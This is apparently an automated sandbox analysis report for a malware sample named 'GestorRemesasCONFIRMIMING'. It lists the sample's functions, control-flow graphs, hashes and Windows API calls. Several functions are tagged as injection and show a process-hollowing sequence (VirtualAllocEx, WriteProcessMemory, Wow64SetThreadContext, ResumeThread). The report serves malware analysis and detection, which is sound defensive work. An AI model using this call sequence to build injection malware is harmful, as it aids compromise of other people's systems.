                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID: px]/$px]/
                                                  • API String ID: 716092398-2092919866
                                                  • Opcode ID: 820d56c3f1127984cc22243d4c6246ad0a64d1d49f3f9a69676c534fd12850bf
                                                  • Instruction ID: d51f760b4b618da9109a382bb026ce283a3ed95ed096a8a4068d5bc855ecf6dd
                                                  • Opcode Fuzzy Hash: 820d56c3f1127984cc22243d4c6246ad0a64d1d49f3f9a69676c534fd12850bf
                                                  • Instruction Fuzzy Hash: 2841CEB1D00359DFDB14CF9AC984ADEBBB5FF48310F24866AE819AB210D774A845CF90
                                                  Function 00BFAE30 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 231 bfae30-bfae3f 232 bfae6b-bfae6f 231->232 233 bfae41-bfae4e call bf9838 231->233 234 bfae83-bfaec4 232->234 235 bfae71-bfae7b 232->235 240 bfae64 233->240 241 bfae50 233->241 242 bfaec6-bfaece 234->242 243 bfaed1-bfaedf 234->243 235->234 240->232 286 bfae56 call bfb0b8 241->286 287 bfae56 call bfb0c8 241->287 242->243 245 bfaf03-bfaf05 243->245 246 bfaee1-bfaee6 243->246 244 bfae5c-bfae5e 244->240 247 bfafa0-bfb060 244->247 248 bfaf08-bfaf0f 245->248 249 bfaee8-bfaeef call bfa814 246->249 250 bfaef1 246->250 281 bfb068-bfb093 GetModuleHandleW 247->281 282 bfb062-bfb065 247->282 252 bfaf1c-bfaf23 248->252 253 bfaf11-bfaf19 248->253 251 bfaef3-bfaf01 249->251 250->251 251->248 255 bfaf25-bfaf2d 252->255 256 bfaf30-bfaf39 call bfa824 252->256 253->252 255->256 262 bfaf3b-bfaf43 256->262 263 bfaf46-bfaf4b 256->263 262->263 264 bfaf4d-bfaf54 263->264 265 bfaf69-bfaf6d 263->265 264->265 267 bfaf56-bfaf66 call bfa834 call bfa844 264->267 268 bfaf73-bfaf76 265->268 267->265 271 bfaf99-bfaf9f 268->271 272 bfaf78-bfaf96 268->272 272->271 283 bfb09c-bfb0b0 281->283 284 bfb095-bfb09b 281->284 282->281 284->283 286->244 287->244
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00BFB086
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID: px]/
                                                  • API String ID: 4139908857-3026016296
                                                  • Opcode ID: 8ee0a65b832029fb23e4e22c65bd60eed51843dc09c014b274972da0a9dd20bf
                                                  • Instruction ID: ce65d8f4d07006ad59254b2a705d61a6ac554a71e676f04c91234cea4404ff49
                                                  • Opcode Fuzzy Hash: 8ee0a65b832029fb23e4e22c65bd60eed51843dc09c014b274972da0a9dd20bf
                                                  • Instruction Fuzzy Hash: A77159B0A00B098FD728DF29D44176ABBF1FF88700F10896DE55ADBA50DB74E949CB91
                                                  Function 04B20BFC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 288 4b20bfc-4b242fc 291 4b24302-4b24307 288->291 292 4b243ac-4b243cc call 4b20ad4 288->292 294 4b2435a-4b24392 CallWindowProcW 291->294 295 4b24309-4b24340 291->295 299 4b243cf-4b243dc 292->299 297 4b24394-4b2439a 294->297 298 4b2439b-4b243aa 294->298 302 4b24342-4b24348 295->302 303 4b24349-4b24358 295->303 297->298 298->299 302->303 303->299
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B24381
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2129060307.0000000004B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_4b20000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID: px]/
                                                  • API String ID: 2714655100-3026016296
                                                  • Opcode ID: e4cf840eb95c977c2c044fcddc7962d86772a92f07791e28c14745c943066a0a
                                                  • Instruction ID: ac0904117cccc369a49157a9c89ccbb1a8059e6763971217b574dbb95e348128
                                                  • Opcode Fuzzy Hash: e4cf840eb95c977c2c044fcddc7962d86772a92f07791e28c14745c943066a0a
                                                  • Instruction Fuzzy Hash: 554136B5A002199FDB04CF99C588AABBBF5FF88314F248498D519AB320D774A841CBA0
                                                  Function 00BF449C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 305 bf449c-bf59d9 CreateActCtxA 309 bf59db-bf59e1 305->309 310 bf59e2-bf5a3c 305->310 309->310 317 bf5a3e-bf5a41 310->317 318 bf5a4b-bf5a4f 310->318 317->318 319 bf5a51-bf5a5d 318->319 320 bf5a60 318->320 319->320 321 bf5a61 320->321 321->321
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00BF59C9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID: px]/
                                                  • API String ID: 2289755597-3026016296
                                                  • Opcode ID: d5f9a8a37ef3ea68a03f66607628c9d81c139a8e36f4f01f983c123ae2fa8be1
                                                  • Instruction ID: e1a95054c27f7205b16ab0614271df2424c28cc6940ea00f57638fdb0e9f88f3
                                                  • Opcode Fuzzy Hash: d5f9a8a37ef3ea68a03f66607628c9d81c139a8e36f4f01f983c123ae2fa8be1
                                                  • Instruction Fuzzy Hash: F141C271C0071DCBDB24CFA9C98479EBBF5BF48704F2481AAD508AB251DBB56949CF90
                                                  Function 00BF590C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 323 bf590c-bf598c 325 bf598f-bf59d9 CreateActCtxA 323->325 327 bf59db-bf59e1 325->327 328 bf59e2-bf5a3c 325->328 327->328 335 bf5a3e-bf5a41 328->335 336 bf5a4b-bf5a4f 328->336 335->336 337 bf5a51-bf5a5d 336->337 338 bf5a60 336->338 337->338 339 bf5a61 338->339 339->339
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 00BF59C9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID: px]/
                                                  • API String ID: 2289755597-3026016296
                                                  • Opcode ID: be87400e57c0391ad6b8b78a77ee9197cb5e536da6ceca14099b78c23525a745
                                                  • Instruction ID: cb9f4c3ac3e312622dddfd07dd9a09cc19c4f6b26e2e5d64ba70a6629dc85416
                                                  • Opcode Fuzzy Hash: be87400e57c0391ad6b8b78a77ee9197cb5e536da6ceca14099b78c23525a745
                                                  • Instruction Fuzzy Hash: BD41C1B1C0071DCBEB24CFA9C98479DBBF5BF48304F2481AAD508AB251DB756949CF90
                                                  Function 06A47428 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 341 6a47428-6a4742d 342 6a4742f-6a47487 341->342 343 6a4741b-6a47427 341->343 345 6a4748e-6a474bd ReadProcessMemory 342->345 343->341 346 6a474c6-6a474f6 345->346 347 6a474bf-6a474c5 345->347 347->346
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A474B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID: px]/
                                                  • API String ID: 1726664587-3026016296
                                                  • Opcode ID: c4944014f19aa8d0e705d8f0aafd0b75b02ec3355aa013155e541917f43b5af7
                                                  • Instruction ID: 85c165ebffa665e76a0acf8bd47329226765ec439b87a7d0e49fe36fb1476fcc
                                                  • Opcode Fuzzy Hash: c4944014f19aa8d0e705d8f0aafd0b75b02ec3355aa013155e541917f43b5af7
                                                  • Instruction Fuzzy Hash: F0212771C013499FDB50DFA9C885AEEBFF4FF88320F14842AE559A7240D7789941CBA5
                                                  Function 06A47338 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 351 6a47338-6a4738e 353 6a47390-6a4739c 351->353 354 6a4739e-6a473dd WriteProcessMemory 351->354 353->354 356 6a473e6-6a47416 354->356 357 6a473df-6a473e5 354->357 357->356
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A473D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID: px]/
                                                  • API String ID: 3559483778-3026016296
                                                  • Opcode ID: c6a230660a00fa122b6944ebd69161190c21a927223a968ff3ecb4f19b1d8a4c
                                                  • Instruction ID: 250258d8ee23c0c24f9d9a8c8da075cc6bbf68ed61c171ed39b81fd52d9e6490
                                                  • Opcode Fuzzy Hash: c6a230660a00fa122b6944ebd69161190c21a927223a968ff3ecb4f19b1d8a4c
                                                  • Instruction Fuzzy Hash: 5F2126769003499FDF10DFA9C981BDEBBF1FF88310F10842AE919A7240C7789951CBA0
                                                  Function 06A46D68 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 361 6a46d68-6a46d6d 362 6a46d6f-6a46dbb 361->362 363 6a46d5b-6a46d5d 361->363 365 6a46dbd-6a46dc9 362->365 366 6a46dcb-6a46dfb Wow64SetThreadContext 362->366 365->366 368 6a46e04-6a46e34 366->368 369 6a46dfd-6a46e03 366->369 369->368
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A46DEE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID: px]/
                                                  • API String ID: 983334009-3026016296
                                                  • Opcode ID: 43ea39a3f0d88b0a99cb8d2c768124daa71b698cfc0b91753c86b91822a39f11
                                                  • Instruction ID: e29d14f03cfe65bb36bb22fdb6a80f5c102ad55506ee8b438809aabcb8a34ff4
                                                  • Opcode Fuzzy Hash: 43ea39a3f0d88b0a99cb8d2c768124daa71b698cfc0b91753c86b91822a39f11
                                                  • Instruction Fuzzy Hash: AD213C71D00309CFDB50DFAAC8857EEBBF4EF88324F14842AD519A7240D7789945CB95
                                                  Function 06A47340 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A473D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID: px]/
                                                  • API String ID: 3559483778-3026016296
                                                  • Opcode ID: 54fa77aa17aff6ac991256fa0a796d5efa3dede0af07fa0b3ae62ccab9e00aaf
                                                  • Instruction ID: e4a64b6a8b323700cd9bc78296408f5cbcba02128c2843ea86bb97d167b00e8c
                                                  • Opcode Fuzzy Hash: 54fa77aa17aff6ac991256fa0a796d5efa3dede0af07fa0b3ae62ccab9e00aaf
                                                  • Instruction Fuzzy Hash: 7721F6729003499FDB50DFA9C885BDEBBF5FF88310F108429E919A7240D778A954CBA5
                                                  Function 00BFD2F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BFD387
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID: px]/
                                                  • API String ID: 3793708945-3026016296
                                                  • Opcode ID: d391da068db1806f8d4c92c7356c8f108f814d5887bc29aacb377476d646a87c
                                                  • Instruction ID: 86172d564741af6994ba611ece5a5503f5ace6ca5e9887d317b85fc4d5ddd15b
                                                  • Opcode Fuzzy Hash: d391da068db1806f8d4c92c7356c8f108f814d5887bc29aacb377476d646a87c
                                                  • Instruction Fuzzy Hash: A12105B5900209DFDB10CFAAD485ADEBFF5FB48310F10845AE918A3210C374A955CFA1
                                                  Function 06A47430 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A474B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID: px]/
                                                  • API String ID: 1726664587-3026016296
                                                  • Opcode ID: 6a34bb5f199773ae69c2f5c6fa9ff4101c0b94c17b840265ea368f23f097b0ba
                                                  • Instruction ID: 0e34cf07631830aefdc5ac86035e2da76274fa308aea9297e0af3fbef7a44bd9
                                                  • Opcode Fuzzy Hash: 6a34bb5f199773ae69c2f5c6fa9ff4101c0b94c17b840265ea368f23f097b0ba
                                                  • Instruction Fuzzy Hash: 3C212871C003499FDB10DFAAC881BEEBBF5FF88310F108429E519A7240C7789950CBA5
                                                  Function 06A46D70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A46DEE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID: px]/
                                                  • API String ID: 983334009-3026016296
                                                  • Opcode ID: b267c1280f5d9b88b48746dfde28bf1264ddb0adb2b0acf892e3b36ea2815e93
                                                  • Instruction ID: 0f8911e5e903dedd51f7285fb34fe69ae46be80a96533bdcb285da70db96ee6d
                                                  • Opcode Fuzzy Hash: b267c1280f5d9b88b48746dfde28bf1264ddb0adb2b0acf892e3b36ea2815e93
                                                  • Instruction Fuzzy Hash: 6D211571D003098FDB54DFAAC8857AEBBF4AF88324F14842AD519A7241DB78A944CFA5
                                                  Function 00BFD300 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BFD387
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID: px]/
                                                  • API String ID: 3793708945-3026016296
                                                  • Opcode ID: 0de485ddf82d3dee447b786a8ca5ee90f18f3b12e4013623afec5978e0a9321d
                                                  • Instruction ID: c55b5e197c6435bd8b1d7ccef31e0e62fc296f5474482328af7bb79660aef263
                                                  • Opcode Fuzzy Hash: 0de485ddf82d3dee447b786a8ca5ee90f18f3b12e4013623afec5978e0a9321d
                                                  • Instruction Fuzzy Hash: BD21C4B5900249DFDB10CF9AD984ADEBFF5FB48320F14845AE918A3350D374A954CFA5
                                                  Function 06A47278 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A472EE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: px]/
                                                  • API String ID: 4275171209-3026016296
                                                  • Opcode ID: a8f77f703a348b98202d17b02eca1674e61a0ae286630bbe45cf827a7d041c57
                                                  • Instruction ID: 0b122ea90f85b207b2b94b9fce8f1e05ad5cf5b2320e2ffb970ba8d0d0480c42
                                                  • Opcode Fuzzy Hash: a8f77f703a348b98202d17b02eca1674e61a0ae286630bbe45cf827a7d041c57
                                                  • Instruction Fuzzy Hash: 791147729002499FDF10EFAAD844BEEBBF5EF88324F20841AE519A7250CB759510CFA0
                                                  Function 00BFA870 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BFB101,00000800,00000000,00000000), ref: 00BFB312
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: px]/
                                                  • API String ID: 1029625771-3026016296
                                                  • Opcode ID: aaf6ca0e4028ecc2e6a9bd8429ea2ae786196e329b83dda439d2083281547ab0
                                                  • Instruction ID: 5569c79e1ba667ebd5d414980125c768b594557c8fa21fd4445bc0137f0b10a2
                                                  • Opcode Fuzzy Hash: aaf6ca0e4028ecc2e6a9bd8429ea2ae786196e329b83dda439d2083281547ab0
                                                  • Instruction Fuzzy Hash: 1111E4B6D003499FDB10CF9AD444AAEFBF4EF48310F10856AE519B7200C3B5A945CFA5
                                                  Function 00BFB2A1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BFB101,00000800,00000000,00000000), ref: 00BFB312
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: px]/
                                                  • API String ID: 1029625771-3026016296
                                                  • Opcode ID: d359413f56e9839bfbf7327cbd9dc1bfc338440987cedd415a37c736209ce8a8
                                                  • Instruction ID: 7a1a7bc2d5ae96385b4b7d91cc73fb6db372abc431a89b9e16a7aba5a5320af6
                                                  • Opcode Fuzzy Hash: d359413f56e9839bfbf7327cbd9dc1bfc338440987cedd415a37c736209ce8a8
                                                  • Instruction Fuzzy Hash: 171114B6D003498FDB14CFAAC844A9EFBF4EB88310F14846AD519A7610C375A545CFA5
                                                  Function 06A46CB8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID: px]/
                                                  • API String ID: 947044025-3026016296
                                                  • Opcode ID: 2c726be02294561e267022fe2500be939dbff52f329269fbaca08ccc6bde5295
                                                  • Instruction ID: 84576f050d6536d49feeedc61a70e9884fbb5590a767fd7e723b190f52ec39ac
                                                  • Opcode Fuzzy Hash: 2c726be02294561e267022fe2500be939dbff52f329269fbaca08ccc6bde5295
                                                  • Instruction Fuzzy Hash: 7C1188B1D003498FDB20EFAAC8857DFFBF4EF88220F208429D519A7240CB75A945CB91
                                                  Function 06A47280 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A472EE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: px]/
                                                  • API String ID: 4275171209-3026016296
                                                  • Opcode ID: b9341bfc0608e23a4fe494538ec9cb78538d70faaeae48074e9754cb4e0c259f
                                                  • Instruction ID: 5578cb8ae9c577807195be74a0c3ec6c92ba95cd829e4ce0d41c371ec098a740
                                                  • Opcode Fuzzy Hash: b9341bfc0608e23a4fe494538ec9cb78538d70faaeae48074e9754cb4e0c259f
                                                  • Instruction Fuzzy Hash: 9C1126729002499FDB10DFAAC845BDFBBF5AF88320F148419E519A7250CB75A950CFA1
                                                  Function 06A46CC0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID: px]/
                                                  • API String ID: 947044025-3026016296
                                                  • Opcode ID: cf59d72f179c412dade037bb52c453597f57bf8f4d6ac905782e8f808cca3253
                                                  • Instruction ID: 12362a406f37394dc2849c6622d286022bd64e593a137528e5716bf164753340
                                                  • Opcode Fuzzy Hash: cf59d72f179c412dade037bb52c453597f57bf8f4d6ac905782e8f808cca3253
                                                  • Instruction Fuzzy Hash: B71136B1D003498FDB20DFAAC84579FFBF4AF88724F248429D519A7240CB79A940CBA5
                                                  Function 00BFB020 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00BFB086
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID: px]/
                                                  • API String ID: 4139908857-3026016296
                                                  • Opcode ID: 4b539bf15905765fd38d3d22f143433c6d60bb8e086f1c816380a693b205ae30
                                                  • Instruction ID: 1860170648f0d39ee69bff0e25cb09f2bff77b367a809033ee965dbae2f0164e
                                                  • Opcode Fuzzy Hash: 4b539bf15905765fd38d3d22f143433c6d60bb8e086f1c816380a693b205ae30
                                                  • Instruction Fuzzy Hash: 831102B6C003498FCB10CFAAC444B9EFBF4EB88320F10845AD529B7210C775A549CFA1
                                                  Function 06A476D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A4BDFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID: px]/
                                                  • API String ID: 410705778-3026016296
                                                  • Opcode ID: 604670b028b2b6f7e01c04024ff18df8a736f2e0f654bc80c59cc2100133f73a
                                                  • Instruction ID: 7c609d4d258708eb09945528b45b7a2592089d0c2e3bd6205d056db244262c9a
                                                  • Opcode Fuzzy Hash: 604670b028b2b6f7e01c04024ff18df8a736f2e0f654bc80c59cc2100133f73a
                                                  • Instruction Fuzzy Hash: 811125B58003499FDB50DF9AC884BDEBBF8EB48320F108459E518A7200C3B4A950CFA0
                                                  Function 06A4BD98 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A4BDFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2131344151.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6a40000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID: px]/
                                                  • API String ID: 410705778-3026016296
                                                  • Opcode ID: bddbe8b332a462c93528f3f311b262d95569d5e47ea3a74839837593e1778edb
                                                  • Instruction ID: c2cdccbc67f39bfe959e3d94ecfadddabd9bdea9c40755336fd40d9fd25954c1
                                                  • Opcode Fuzzy Hash: bddbe8b332a462c93528f3f311b262d95569d5e47ea3a74839837593e1778edb
                                                  • Instruction Fuzzy Hash: 9611F2B58003499FDB10DF9AD985BDEFFF8EB88320F208459E558A7210C379A954CFA1
                                                  Function 00BF5A84 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122753782.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_bf0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3649285415919f2313c5a6ba101c9ed5ee40e468b7766fd7522c2b7bad2a29c3
                                                  • Instruction ID: d78cde92daa4d6afceb6b9d16acbe455585bdfeb2fdce8dd049e9cfffa971da7
                                                  • Opcode Fuzzy Hash: 3649285415919f2313c5a6ba101c9ed5ee40e468b7766fd7522c2b7bad2a29c3
                                                  • Instruction Fuzzy Hash: 2B31BC71804A4DCFDF20CFA8C8857EDBBF0EB45314F54828AC245AB252CB75A94ACF51
                                                  Function 00B6D3D8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2122388739.0000000000B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B6D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b6d000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf78c8c7ca27e07286b6ae8adcd9e766d09c2f3a3aa14904fe947c36e04389eb
